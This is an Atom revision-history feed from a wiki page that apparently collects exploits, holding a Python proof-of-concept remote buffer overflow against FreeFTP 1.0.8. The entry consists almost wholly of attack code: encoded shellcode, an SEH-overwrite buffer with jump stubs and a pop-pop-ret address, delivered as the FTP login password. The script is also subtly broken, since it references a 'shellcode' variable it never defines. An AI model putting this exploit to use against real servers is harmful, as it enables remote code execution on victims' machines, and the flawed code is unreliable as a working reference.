<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FreeFTP_1.0.8_%27PASS%27_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>FreeFTP 1.0.8 'PASS' 遠程緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=FreeFTP_1.0.8_%27PASS%27_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FreeFTP_1.0.8_%27PASS%27_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T08:14:19Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=FreeFTP_1.0.8_%27PASS%27_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1768&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow # Date: 2019-09-01 # Author: Chet Manly # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=FreeFTP_1.0.8_%27PASS%27_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=1768&amp;oldid=prev"/>
		<updated>2021-04-20T05:57:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow # Date: 2019-09-01 # Author: Chet Manly # Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow&lt;br /&gt;
# Date: 2019-09-01&lt;br /&gt;
# Author: Chet Manly&lt;br /&gt;
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html&lt;br /&gt;
# Version: 1.0.8&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
&lt;br /&gt;
from ftplib import FTP&lt;br /&gt;
&lt;br /&gt;
buf =  &amp;quot;&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x45\x35\x53\x30\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buf = 'A' * 276&lt;br /&gt;
buf += '\x90' * 10&lt;br /&gt;
buf += shellcode&lt;br /&gt;
buf += 'B' * (486 - len(shellcode))&lt;br /&gt;
buf += '\x58' # pop eax&lt;br /&gt;
buf += '\xfe\xcc' # dec ah&lt;br /&gt;
buf += '\xfe\xcc' # dec ah&lt;br /&gt;
buf += '\xff\xe0' # jmp eax&lt;br /&gt;
buf += 'C' * 4&lt;br /&gt;
buf += '\xe8\xf0\xff\xff\xff' # call near&lt;br /&gt;
buf += 'D' * 9&lt;br /&gt;
buf += '\xeb\xf0\x90\x90' # jump backwards&lt;br /&gt;
buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret&lt;br /&gt;
buf += 'E' * (1000 - len(buf))&lt;br /&gt;
ftp = FTP()&lt;br /&gt;
ftp.connect('192.168.1.1', 21)&lt;br /&gt;
ftp.login('anonymous', buf)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>